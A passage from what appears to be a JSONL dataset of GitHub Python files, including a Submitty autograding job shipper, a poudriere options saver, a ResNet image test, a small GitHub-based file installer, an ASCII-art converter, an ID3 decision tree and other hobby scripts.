grading_file = os.path.join(folder,\"GRADING_\"+just_file)\n if grading_file in files:\n continue\n\n # found something to do\n try:\n with open(full_path_file, 'r') as infile:\n queue_obj = json.load(infile)\n except:\n continue\n\n #Check to make sure that we are capable of grading this submission\n required_capabilities = queue_obj[\"required_capabilities\"]\n if not required_capabilities in my_capabilities:\n continue\n\n # prioritize interactive jobs over (batch) regrades\n # if you've found an interactive job, exit early (since they are sorted by timestamp)\n if not \"regrade\" in queue_obj or not queue_obj[\"regrade\"]:\n my_job = just_file\n break\n\n # otherwise it's a regrade, and if we don't already have a\n # job, take it, but we have to search the rest of the list\n if my_job == \"\":\n my_job = just_file\n\n if not my_job == \"\":\n grading_file = os.path.join(folder, \"GRADING_\" + my_job)\n # create the grading file\n with open(os.path.join(grading_file), \"w\") as queue_file:\n json.dump({\"untrusted\": which_untrusted}, queue_file)\n\n overall_lock.release()\n\n time_get_job_end = dateutils.get_current_time()\n\n time_delta = time_get_job_end-time_get_job_begin\n if time_delta > datetime.timedelta(milliseconds=100):\n print (my_name, \" WARNING: submitty_autograding shipper get_job time \", time_delta)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+\" WARNING: submitty_autograding shipper get_job time \"+str(time_delta))\n\n return (my_job)\n\n\n# ==================================================================================\n# ==================================================================================\ndef shipper_process(my_name,my_data,full_address,which_untrusted,overall_lock):\n \"\"\"\n Each shipper process spins in a loop, looking for a job that\n matches the capabilities of this machine, and then oversees the\n autograding of that job. Interactive jobs are prioritized over\n batch (regrade) jobs. If no jobs are available, the shipper waits\n on an event editing one of the queues.\n \"\"\"\n\n which_machine = full_address\n my_capabilities = my_data[my_name]['capabilities']\n\n # ignore keyboard interrupts in the shipper processes\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n counter=0\n while True:\n try:\n my_job = get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock)\n if not my_job == \"\":\n counter=0\n grade_queue_file(my_name,which_machine,which_untrusted,os.path.join(INTERACTIVE_QUEUE,my_job))\n continue\n else:\n if counter == 0 or counter >= 10:\n print (\"{0} {1}: no available job\".format(my_name, which_untrusted))\n counter=0\n counter+=1\n time.sleep(1)\n\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n my_message = \"ERROR in get_job {0} {1} {2}. For more details, see traces entry\".format(which_machine,which_untrusted,str(e))\n print (my_message)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=my_message)\n time.sleep(1)\n\n\n\n# ==================================================================================\n# ==================================================================================\ndef launch_shippers(worker_status_map):\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"grade_scheduler.py launched\")\n\n # Clean up old files from previous shipping/autograding (any\n # partially completed work will be re-done)\n for file_path in Path(INTERACTIVE_QUEUE).glob(\"GRADING_*\"):\n file_path = str(file_path)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Remove old queue file: \" + file_path)\n os.remove(file_path)\n\n for file_path in Path(SUBMITTY_DATA_DIR, \"autograding_TODO\").glob(\"untrusted*\"):\n file_path = str(file_path)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Remove autograding TODO file: \" + file_path)\n os.remove(file_path)\n for file_path in Path(SUBMITTY_DATA_DIR, \"autograding_DONE\").glob(\"*\"):\n file_path = str(file_path)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Remove autograding DONE file: \" + file_path)\n os.remove(file_path)\n\n # this lock will be used to edit the queue or new job event\n overall_lock = multiprocessing.Lock()\n\n # The names of the worker machines, the capabilities of each\n # worker machine, and the number of workers per machine are stored\n # in the autograding_workers json.\n try:\n autograding_workers_path = os.path.join(SUBMITTY_INSTALL_DIR, 'config', \"autograding_workers.json\")\n with open(autograding_workers_path, 'r') as infile:\n autograding_workers = json.load(infile)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n raise SystemExit(\"ERROR: could not locate the autograding workers json: {0}\".format(e))\n\n # There must always be a primary machine, it may or may not have\n # autograding workers.\n if not \"primary\" in autograding_workers:\n raise SystemExit(\"ERROR: autograding_workers.json contained no primary machine.\")\n\n # One (or more) of the machines must accept \"default\" jobs.\n default_present = False\n for name, machine in autograding_workers.items():\n if \"default\" in machine[\"capabilities\"]:\n default_present = True\n break\n if not default_present:\n raise SystemExit(\"ERROR: autograding_workers.json contained no machine with default capabilities\")\n\n # Launch a shipper process for every worker on the primary machine and each worker machine\n total_num_workers = 0\n processes = list()\n for name, machine in autograding_workers.items():\n if worker_status_map[name] == False:\n print(\"{0} could not be reached, so we are not spinning up shipper threads.\".format(name))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"{0} could not be reached, so we are not spinning up shipper threads.\".format(name))\n continue\n if 'enabled' in machine and machine['enabled'] == False:\n print(\"{0} is disabled, so we are not spinning up shipper threads.\".format(name))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"{0} is disabled, so we are not spinning up shipper threads.\")\n continue\n try:\n full_address = \"\"\n if machine[\"address\"] != \"localhost\":\n if machine[\"username\"] == \"\":\n raise SystemExit(\"ERROR: empty username for worker machine {0} \".format(machine[\"address\"]))\n full_address = \"{0}@{1}\".format(machine[\"username\"], machine[\"address\"])\n else:\n if not machine[\"username\"] == \"\":\n raise SystemExit('ERROR: username for primary (localhost) must be \"\"')\n full_address = machine['address']\n\n num_workers_on_machine = machine[\"num_autograding_workers\"]\n if num_workers_on_machine < 0:\n raise SystemExit(\"ERROR: num_workers_on_machine for '{0}' must be non-negative.\".format(machine))\n\n single_machine_data = {name : machine}\n single_machine_data = add_fields_to_autograding_worker_json(single_machine_data, name)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print(\"ERROR: autograding_workers.json entry for {0} contains an error: {1}. For more details, see trace entry.\".format(name, e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: autograding_workers.json entry for {0} contains an error: {1} For more details, see trace entry.\".format(name,e))\n continue\n # launch the shipper threads\n for i in range(0,num_workers_on_machine):\n u = \"untrusted\" + str(i).zfill(2)\n p = multiprocessing.Process(target=shipper_process,args=(name,single_machine_data,full_address, u,overall_lock))\n p.start()\n processes.append(p)\n total_num_workers += num_workers_on_machine\n\n # main monitoring loop\n try:\n while True:\n alive = 0\n for i in range(0,total_num_workers):\n if processes[i].is_alive:\n alive = alive+1\n else:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: process \"+str(i)+\" is not alive\")\n if alive != total_num_workers:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: #shippers=\"+str(total_num_workers)+\" != #alive=\"+str(alive))\n #print (\"shippers= \",total_num_workers,\" alive=\",alive)\n time.sleep(1)\n\n except KeyboardInterrupt:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"grade_scheduler.py keyboard interrupt\")\n # just kill everything in this group id right now\n # NOTE: this may be a bug if the grandchildren have a different group id and not be killed\n os.kill(-os.getpid(), signal.SIGKILL)\n\n # run this to check if everything is dead\n # ps xao pid,ppid,pgid,sid,comm,user | grep untrust\n\n # everything's dead, including the main process so the rest of this will be ignored\n # but this was mostly working...\n\n # terminate the jobs\n for i in range(0,total_num_workers):\n processes[i].terminate()\n # wait for them to join\n for i in range(0,total_num_workers):\n processes[i].join()\n\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"grade_scheduler.py terminated\")\n\n\n# ==================================================================================\nif __name__ == \"__main__\":\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n\n worker_status_map = update_all_foreign_autograding_workers()\n launch_shippers(worker_status_map)\n","repo_name":"VictoriaSavage526/Submitty","sub_path":"sbin/submitty_autograding_shipper.py","file_name":"submitty_autograding_shipper.py","file_ext":"py","file_size_in_byte":42995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72647626026","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport torch\r\nfrom torchvision import datasets, models, transforms\r\nimport torch.nn as nn\r\nfrom torch.nn import functional as F\r\nimport torch.optim as optim\r\nimport torchvision\r\nimport cv2\r\nimport glob\r\n\r\ndef dip(f):\r\n image = cv2.imread(f)\r\n edges = cv2.Canny(image, 50, 95)\r\n \r\n # 使用Hough Line Transform檢測直線\r\n lines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=100, minLineLength=100, maxLineGap=10)\r\n\r\n # 找到最下面的直線\r\n if lines is not None:\r\n # 將直線根據Y座標進行排序\r\n lines = sorted(lines, key=lambda line: line[0][1], reverse=True)\r\n \r\n # 繪製最下面的直線(假設只有一條)\r\n x1, y1, x2, y2 = lines[0][0]\r\n print(x1, y1, x2, y2)\r\n cv2.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)\r\n cv2.imshow('crop1',image)\r\n cv2.waitKey(0)\r\n\r\n img = image[y1-60:y1-15,:]\r\n print(img.shape)\r\n alpha = 100.5 #對比\r\n beta = 12 #亮度\r\n img = cv2.GaussianBlur(img,(5,5),1)\r\n cv2.imshow('crop1',img)\r\n cv2.waitKey(0)\r\n enhance = cv2.convertScaleAbs(img, alpha, beta)\r\n cv2.imshow('enhance',enhance)\r\n cv2.waitKey(0)\r\n return enhance\r\n\r\ndef load_model():\r\n return\r\n\r\ndef test(img_f):\r\n num_classes = 2\r\n\r\n # 创建ResNet-50模型\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n model = models.resnet50(pretrained=False).to(device)\r\n model.fc = nn.Sequential(\r\n nn.Linear(2048, 128),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(128, num_classes)).to(device)\r\n model.load_state_dict(torch.load('models/validation loss_ 0.0254 acc_ 0.9957best.h5'))\r\n model.eval() # 将模型设置为评估模式\r\n transform = transforms.Compose([\r\n transforms.Resize((45,640)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n mypath = glob.glob(\"./ng/*jpg\")\r\n for f in mypath:\r\n # 加载待预测的图像\r\n # image = Image.open(f)\r\n image = Image.fromarray(dip(f))\r\n image = transform(image).to(device)\r\n image = image.unsqueeze(0) # 添加一个维度,以匹配模型的输入形状\r\n\r\n pred_logits_tensor = model(image)\r\n # print(pred_logits_tensor)\r\n pred_probs = F.softmax(pred_logits_tensor, dim=1).cpu().data.numpy()\r\n # print(pred_probs)\r\n print(\"{:.0f}% NG, {:.0f}% OK\".format(100*pred_probs[0,0],\r\n 100*pred_probs[0,1]))\r\n\r\ntest('')","repo_name":"MerryKo/LSRC","sub_path":"resnet_test_one.py","file_name":"resnet_test_one.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37371369354","text":"import logging\nimport itertools\nimport os\nimport attr\nimport shutil\nfrom poudriere_saver import option_grammar\n\nLOGGER = logging.getLogger(\"pty\")\n\n\n@attr.s\nclass Jail(object):\n name = attr.ib()\n version = attr.ib()\n arch = attr.ib()\n\n\n@attr.s\nclass Port(object):\n name = attr.ib()\n path = attr.ib()\n\n\ndef build_filename(jail, port, _set, tail):\n segs = []\n if jail is not None:\n segs.append(jail.name)\n if port is not None:\n segs.append(port.name)\n if _set is not None:\n segs.append(_set)\n segs.append(tail)\n return jail, port, _set, \"-\".join(segs)\n\n\n# See man poudriere for informations about file order\ndef generate_files2(jails, ports, sets, tail):\n yield None, None, None, tail\n # sets\n for s in sets:\n yield build_filename(None, None, s, tail)\n # ports\n for p in ports:\n yield build_filename(None, p, None, tail)\n # jail\n for j in jails:\n yield build_filename(j, None, None, tail)\n # ports sets\n for p, s in itertools.product(ports, sets):\n yield build_filename(None, p, s, tail)\n # jails ports\n for j, p in itertools.product(jails, ports):\n yield build_filename(j, p, None, tail)\n # jails sets\n for j, s in itertools.product(jails, sets):\n yield build_filename(j, None, s, tail)\n # jails ports sets\n for j, p, s in itertools.product(jails, ports, sets):\n yield build_filename(j, p, s, tail)\n\n\n# Same thing, but build absolute path, and drop those that don't exists\ndef generate_files(root_dir, j, p, s, t):\n for j, p, s, f in generate_files2(j, p, s, t):\n path = os.path.join(root_dir, f)\n if os.path.exists(path):\n yield j, p, s, os.path.abspath(path)\n\n\ndef generate_options_files(r, j, p, s):\n return reversed(tuple(generate_files(r, j, p, s, \"options\")))\n\n\ndef generate_make_conf_files(r, j, p, s):\n return generate_files(r, j, p, s, \"make.conf\")\n\n\n# Same thing with blacklist, poudriere\n\n\n# Load every option in this directory\n# Return a dictionnary of category, where every element is a port\ndef load_option_directories(option_dir):\n LOGGER.debug(\"Load option directory %s\", option_dir)\n res = {}\n for dir_name in os.listdir(option_dir):\n split = dir_name.split(\"_\")\n category = split[0]\n name = \"_\".join(split[1:])\n opt_file = os.path.join(option_dir, dir_name, \"options\")\n if os.path.isfile(opt_file):\n LOGGER.debug(\n \"Load port %s/%s configuration from %s\", category, name, opt_file\n )\n with open(opt_file) as fd:\n c = option_grammar.parse(fd)\n if category not in res:\n res[category] = {name: c}\n else:\n res[category][name] = c\n else:\n LOGGER.warning(\"%s no such file in %s\", opt_file, option_dir)\n return res\n\n\n# Load options from this directory\ndef load_options(root_dir, jails, ports, sets):\n LOGGER.debug(\"Load options files from %s\", root_dir)\n opts = []\n opt_files = generate_options_files(root_dir, jails, ports, sets)\n for jail, port, _set, opt_dir in opt_files:\n opt = {}\n if jail is not None:\n opt[\"jail\"] = attr.asdict(jail)\n if port is not None:\n opt[\"tree\"] = attr.asdict(port)\n if _set is not None:\n opt[\"set\"] = _set\n opt[\"ports\"] = load_option_directories(opt_dir)\n opts.append(opt)\n return opts\n\n\ndef load_make_conf_files(root_dir, jails, ports, sets):\n LOGGER.debug(\"Load make.conf from %s\", root_dir)\n conf = []\n conf_files = generate_make_conf_files(root_dir, jails, ports, sets)\n for jail, port, _set, make_conf in conf_files:\n c = {}\n if jail is not None:\n c[\"jail\"] = attr.asdict(jail)\n if port is not None:\n c[\"tree\"] = attr.asdict(port)\n if _set is not None:\n c[\"set\"] = _set\n LOGGER.debug(\"Load configuration file %s\", make_conf)\n with open(make_conf) as conf_fd:\n c[\"conf\"] = option_grammar.parse(conf_fd)\n conf.append(c)\n return conf\n\n\ndef write_conf_file(path, conf):\n def write(l):\n fd.write(l + \"\\n\")\n\n with open(path, \"w\") as fd:\n write(\"# This file was generated by poudriere_saver\")\n # For now, only one operator is supported\n for o, values in conf.items():\n for v in values:\n write(f\"{o}+={v}\")\n\n\ndef write_port_options(parent_dir, category, port, conf):\n pdir_name = f\"{category}_{port}\"\n pdir_path = os.path.join(parent_dir, pdir_name)\n pconf_path = os.path.join(pdir_path, \"options\")\n LOGGER.debug(\"Create port %s/%s configurations\", category, port)\n os.mkdir(pdir_path)\n write_conf_file(pconf_path, conf)\n\n\ndef get_segment_filename(segment, tail):\n if \"jail\" in segment:\n jail = Jail(\n segment[\"jail\"][\"name\"], segment[\"jail\"][\"version\"], segment[\"jail\"][\"arch\"]\n )\n else:\n jail = None\n if \"tree\" in segment:\n port = Port(segment[\"tree\"][\"name\"], segment[\"tree\"][\"path\"])\n else:\n port = None\n _set = segment.get(\"set\", None)\n _, _, _, name = build_filename(jail, port, _set, tail)\n return name\n\n\ndef write_options(conf, dest_dir):\n LOGGER.debug(\"Write options files in %s\", dest_dir)\n for seg in conf:\n dir_path = os.path.join(dest_dir, get_segment_filename(seg, \"options\"))\n # If this directory exists, drop it\n if os.path.exists(dir_path):\n LOGGER.warning(\"Delete previous %s\", dir_path)\n shutil.rmtree(dir_path)\n else:\n LOGGER.debug(\"Create %s\", dir_path)\n os.makedirs(dir_path)\n for category in seg.get(\"ports\", {}):\n for port, c in seg[\"ports\"][category].items():\n write_port_options(dir_path, category, port, c)\n\n\ndef write_make_conf(conf, dest_dir):\n LOGGER.debug(\"Write make.conf files in %s\", dest_dir)\n for seg in conf:\n file_path = os.path.join(dest_dir, get_segment_filename(seg, \"make.conf\"))\n LOGGER.debug(\"Write %s\", file_path)\n write_conf_file(file_path, seg[\"conf\"])\n\n\nCLEAN_DIRECTORY_IGNORE_FILENAMES = (\"jails\", \"ports\")\n\n\ndef clean_directory(dir_path):\n # Drop every file in directory but those which must remains to keep\n # poudriere working\n for n in os.listdir(dir_path):\n if n not in CLEAN_DIRECTORY_IGNORE_FILENAMES:\n path = os.path.join(dir_path, n)\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.unlink(path)\n","repo_name":"OnyxMsi/poudriere_saver","sub_path":"poudriere_saver/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22207088688","text":"import urllib.request\nimport os\n\n# install install.txt\n# txt file containing list of files\n\n\n\ndef find_files(file):\n with open(file) as f:\n content = f.readlines()\n # you may also want to remove whitespace characters like `\\n` at the end of each line\n return [x.strip() for x in content]\n\n\n\ndef install():\n for content in contents:\n url = 'https://github.com/imifk/pathfinder/blob/master/{}?raw=true'.format(content)\n print('downloading {} '.format(content), end=\"\\r\")\n f = urllib.request.urlopen(url)\n file = f.read()\n f.close()\n f2 = open(content, 'wb')\n f2.write(file)\n f2.close()\n return\n\ndef reinstall():\n try:\n f = open(\"install.txt\")\n contents = find_files('install.txt')\n print('deleting old files . . .')\n print(contents)\n for content in contents:\n print(content)\n os.remove(content)\n f.close()\n os.remove('install.txt')\n except IOError:\n print(\"File not accessible\")\n finally:\n pass\n\ndef hide_file():\n os.system(f'attrib +h install.txt')\n for content in contents:\n os.system(f'attrib +h {content}')\n os.system('attrib -h Pathinator.exe')\n return\n\nreinstall()\n\nurl = 'https://github.com/imifk/pathfinder/blob/master/install.txt?raw=true'\n\nf = urllib.request.urlopen(url)\nfile = f.read()\nf.close()\nf2 = open('install.txt', 'wb')\nf2.write(file)\nf2.close()\n\ncontents = find_files('install.txt')\nprint(f'downloading {contents}')\n\ninstall()\n\nhide_file()\n\nprint('finished ')\nprint('if install.txt is present.')\nprint('re-run software')\nprint('. . .')\ninput(\"Press Enter to exit...\")\n\n","repo_name":"imkuro02/pathfinder","sub_path":"installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13260414998","text":"import csv\nfrom collections import Counter\nfrom math import log2\n\ndef load_data(path):\n data = []\n with open(path, 'r') as file:\n csv_reader = csv.DictReader(file)\n for row in csv_reader:\n data.append(row)\n return data\n \n\nclass Node:\n def __init__(self, value, children):\n self.value = value\n self.children = children\n\nclass Leaf:\n def __init__(self, value):\n self.value = value\n \nclass Id3:\n \n def __init__(self, hiperparam=None):\n self.root= None\n self.hiperparam = hiperparam\n \n \n def fit(self, dataset):\n x = list(dataset[0].keys())[:-1]\n self.root = self.id3(dataset,dataset, x)\n print('[BRANCHES]:')\n self.print_tree(self.root)\n \n\n def predict(self, test_dataset):\n predictions = []\n for x in test_dataset:\n predictions.append(self.predict_part(x, self.root))\n print('[PREDICTIONS]:', ' '.join(predictions))\n return predictions\n\n def predict_part(self, x, root):\n if isinstance(root, Leaf):\n return root.value\n else:\n for value, child in root.children:\n if x[root.value] == value:\n return self.predict_part(x, child)\n return 'maybe'\n \n\n \n def id3(self, d, d_par, X, depth=0):\n \n \n if depth == self.hiperparam:\n return Leaf(self.most_common_label(d))\n \n if not d:\n return Leaf(self.most_common_label(d_par))\n \n v = self.most_common_label(d)\n \n if not X or self.entropy(d) == 0:\n return Leaf(v)\n \n x = self.most_discriminating_feature(d,X)\n \n subtrees = []\n \n vals = set()\n for row in d:\n vals.add(row[x])\n\n for value in vals:\n t = self.id3(self.remove_feature_from_dataset(d,x,value),d,self.remove_feature_from_list(X,x), depth+1)\n subtrees.append((value,t))\n\n return Node(x,subtrees)\n \n\n def print_tree(self, root, path=[], depth=1):\n if isinstance(root, Leaf):\n print(' '.join(path) + ' ' + root.value)\n else:\n for value, child in root.children:\n new_path = path + [str(depth) + \":\" + root.value + \"=\" + value]\n self.print_tree(child, new_path, depth+1)\n\n\n \n def most_discriminating_feature(self,dataset, x):\n igs = {}\n for i in x:\n igs[i] = self.information_gain(dataset,i)\n print('IG(' + i + ') = ' + str(igs[i]))\n \n sorted_igs = dict(sorted(igs.items()))\n\n return max(sorted_igs, key=sorted_igs.get)\n \n def remove_feature_from_dataset(self, dataset, feature , value):\n new_dataset = []\n \n for row in dataset:\n if row[feature] == value:\n new_dataset.append(row)\n return new_dataset\n \n def remove_feature_from_list(self, X, x):\n new_list = []\n \n for k in X:\n if k != x:\n new_list.append(k)\n \n return new_list\n \n\n def most_common_label(self, dataset):\n labels = self.get_labels(dataset)\n labels.sort()\n counter = Counter(labels)\n return counter.most_common(1)[0][0]\n\n \n def entropy(self, dataset):\n labels = self.get_labels(dataset)\n freq = Counter(labels)\n ent = 0\n for x in freq:\n prob = freq[x] / len(labels)\n ent -= prob * log2(prob)\n return ent\n\n def information_gain(self, dataset, feature):\n feature_values = []\n for row in dataset:\n feature_values.append(row[feature])\n \n counter = Counter(feature_values)\n init_entropy = self.entropy(dataset)\n expected_entropy = self.calculate_expected_entropy_sum(dataset, feature, counter)\n gain = init_entropy - expected_entropy\n return gain\n\n def calculate_expected_entropy_sum(self, dataset, feature, counter):\n sum = 0\n for val in counter:\n prob = counter[val] / len(dataset)\n subset = self.subset(dataset, feature, val)\n entropy_of_subset = self.entropy(subset)\n expected_ent = prob * entropy_of_subset\n sum += expected_ent\n return sum\n\n \n def subset(self, dataset, feature, value):\n subset = []\n for row in dataset:\n if row[feature] == value:\n subset.append(row)\n return subset\n\n def calculate_and_print_accuracy(self, dataset, predictions):\n true_labels = self.get_labels(dataset)\n correct = 0\n for true, pred in zip(true_labels, predictions):\n if true == pred:\n correct += 1\n accuracy = correct / len(true_labels)\n print('[ACCURACY]:', f'{accuracy:.5f}')\n return accuracy\n\n \n def get_labels(self, dataset):\n labels = []\n for row in dataset:\n last_key = list(row.keys())[-1]\n label = row[last_key]\n labels.append(label)\n return labels\n \n def calculate_confusion_matrix(self, dataset, predictions):\n labels_dataset = self.get_labels(dataset)\n\n unique_labels = sorted(list(set(labels_dataset)))\n\n num_labels = len(unique_labels)\n\n matrix = []\n for _ in range(num_labels):\n row = [0] * num_labels\n matrix.append(row)\n \n for true_label, predicted_label in zip(labels_dataset, predictions):\n true_index = unique_labels.index(true_label)\n predicted_index = unique_labels.index(predicted_label)\n matrix[true_index][predicted_index] += 1\n\n self.print_confusion_matrix(matrix)\n\n return matrix\n\n def print_confusion_matrix(self, matrix):\n print('[CONFUSION_MATRIX]:')\n for row in matrix:\n print(' '.join(map(str, row)))\n\n\n\nimport sys\ndef main():\n train_data = load_data(sys.argv[1])\n test_data = load_data(sys.argv[2])\n \n if len(sys.argv) == 3:\n hiperparam = None\n id3 = Id3()\n else:\n hiperparam = int(sys.argv[3])\n id3 = Id3(hiperparam)\n\n id3.fit(train_data)\n predictions = id3.predict(test_data)\n id3.calculate_and_print_accuracy(test_data, predictions)\n \n #if(len(set(predictions)) > 0):\n id3.calculate_confusion_matrix(test_data, predictions)\n \n\nif __name__ == '__main__':\n main()\n \n \n\n \n \n \n\n \n ","repo_name":"zzunic2123/introduction-to-artificial-intelligence","sub_path":"lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1886621715","text":"from mmf.common.registry import registry\nfrom mmf.datasets.builders.girasoles_sensor.dataset import GirasolesSensorDataset\nfrom mmf.datasets.mmf_dataset_builder import MMFDatasetBuilder\n\n\n@registry.register_builder(\"girasoles_sensor\")\nclass GirasolesSensorBuilder(MMFDatasetBuilder):\n def __init__(\n self, dataset_name=\"girasoles_sensor\", dataset_class=GirasolesSensorDataset, *args, **kwargs\n ):\n super().__init__(dataset_name, dataset_class, *args, **kwargs)\n\n @classmethod\n def config_path(cls):\n return \"configs/datasets/girasoles_sensor/defaults.yaml\"","repo_name":"Emory-AIMS/Multi-Sensor","sub_path":"mmf/datasets/builders/girasoles_sensor/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26327571509","text":"with open('input.txt', 'r') as input_file:\n lines = [line.strip() for line in input_file.readlines() if len(line) > 1]\n\n\ndef parse(line):\n depths = []\n values = []\n depth = 0\n for char in line:\n if char == '[':\n depth += 1\n elif char == ']':\n depth -= 1\n elif char in '0123456789':\n depths.append(depth)\n values.append(int(char))\n return depths, values\n\ndef reduce(values, depths):\n print(f\"\\nvalues: {values}\\ndepths: {depths}\")\n for i, (depth, value) in enumerate(zip(depths, values)):\n\n if depth > 4 and i < len(depths) - 1 and depths[i + 1] == depth:\n print(\"Explode\")\n if i - 1 >= 0:\n values[i - 1] += value\n if i + 2 < len(values):\n values[i + 2] += values[i + 1]\n\n values = values[:i] + [0] + values[i + 2:]\n depths = depths[:i] + [depth - 1] + depths[i + 2:]\n break\n elif value > 9:\n print(\"Split\")\n values = values[:i] + [value // 2, value // 2 + value % 2] + values[i + 1:]\n depths = depths[:i] + [depth + 1, depth + 1] + depths[i + 1:]\n break\n else:\n print('done')\n print(f\"\\nvalues: {values}\\ndepths: {depths}\")\n return values, depths\n\ndef add(v1, d1, v2, d2):\n depths = [d+1 for d in d1] + [d+1 for d in d2]\n values = v1+v2\n return reduce(values, depths)\n\nprint(add(*parse(lines[0]), *parse(lines[1])))\n\n","repo_name":"LLinville/misc_code","sub_path":"advent2021/18/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3996512457","text":"\nimport numpy \nimport matplotlib.pyplot as plot\n\n\ndef y(x):\n return numpy.exp(-x) * numpy.sin(2 * x + numpy.pi / 3)\n\n\nx = numpy.linspace(-2 * numpy.pi, 2 * numpy.pi, 1000)\n\n\ny = y(x)\n\n\nplot.plot(x, y)\n\n\nplot.xlabel('x')\n\nplot.ylabel('y')\n\nplot.title('y = e^(-x) * sin(2x + pi/3), -2pi ≤ x ≤ 2pi')\n\n\nplot.show()\n","repo_name":"floff02/Skills-Audit","sub_path":"graph_plotting.py","file_name":"graph_plotting.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38475305007","text":"import click as click\nimport cv2, time, os, sys\nfrom ascii import render\n\n\n@click.command()\n@click.option('--input', prompt='Input image file', help='Input image')\n@click.option('--output', default='', help='Output txt (print to console if not set)')\n@click.option('--height', default=50, help='ASCII art height (0 for terminal height)')\n@click.option('--gradient', default=' .:!/r(l1Z4H9W8$@', help='Symbols for output (from the darkest to brightest)')\n@click.option('--font-aspect', default='7/15', help='Symbol aspect (default for Cascadia Code font) Pattern: x/y')\ndef main(input: str, output: str, height: int, gradient: str, font_aspect: str):\n img = cv2.imread(input)\n frame = img\n frame_h, frame_w, _ = frame.shape\n aspect = frame_w / frame_h\n\n if height == 0:\n height = os.get_terminal_size().lines\n\n font_aspect = tuple(map(int, font_aspect.split('/')))\n symbol_aspect = font_aspect[0] / font_aspect[1]\n\n resolution = (round(height * aspect / symbol_aspect), height)\n frame = cv2.resize(frame, resolution, interpolation=cv2.INTER_AREA)\n art = render(frame, gradient)\n\n if output != '':\n with open(output, 'w') as f:\n f.write(art)\n else:\n print(art)\n\n\nif __name__ == '__main__':\n main()","repo_name":"barabum0/python-ascii","sub_path":"image2ascii.py","file_name":"image2ascii.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71368012587","text":"# follow FS-Net\nimport torch.nn as nn\nimport network.fs_net_repo.gcn3d as gcn3d\nimport torch\nimport torch.nn.functional as F\nfrom absl import app\nimport absl.flags as flags\nfrom network.fs_net_repo.pcl_encoder import PCL_Encoder\nFLAGS = flags.FLAGS\nfrom mmcv.cnn import normal_init, constant_init\nfrom torch.nn.modules.batchnorm import _BatchNorm\n\n# global feature num : the channels of feature from rgb and depth\n# grid_num : the volume resolution\n\nclass FaceRecon(nn.Module):\n def __init__(self):\n super(FaceRecon, self).__init__()\n self.neighbor_num = FLAGS.gcn_n_num\n self.support_num = FLAGS.gcn_sup_num\n # 3D convolution for point cloud\n self.recon_num = 3\n self.face_recon_num = FLAGS.face_recon_c\n\n dim_fuse = sum([128, 128, 256, 256, 512, FLAGS.obj_c, FLAGS.feat_seman])\n # 16: total 6 categories, 256 is global feature\n self.conv1d_block = nn.Sequential(\n nn.Conv1d(dim_fuse, 512, 1),\n nn.BatchNorm1d(512),\n nn.ReLU(inplace=True),\n nn.Conv1d(512, 512, 1),\n 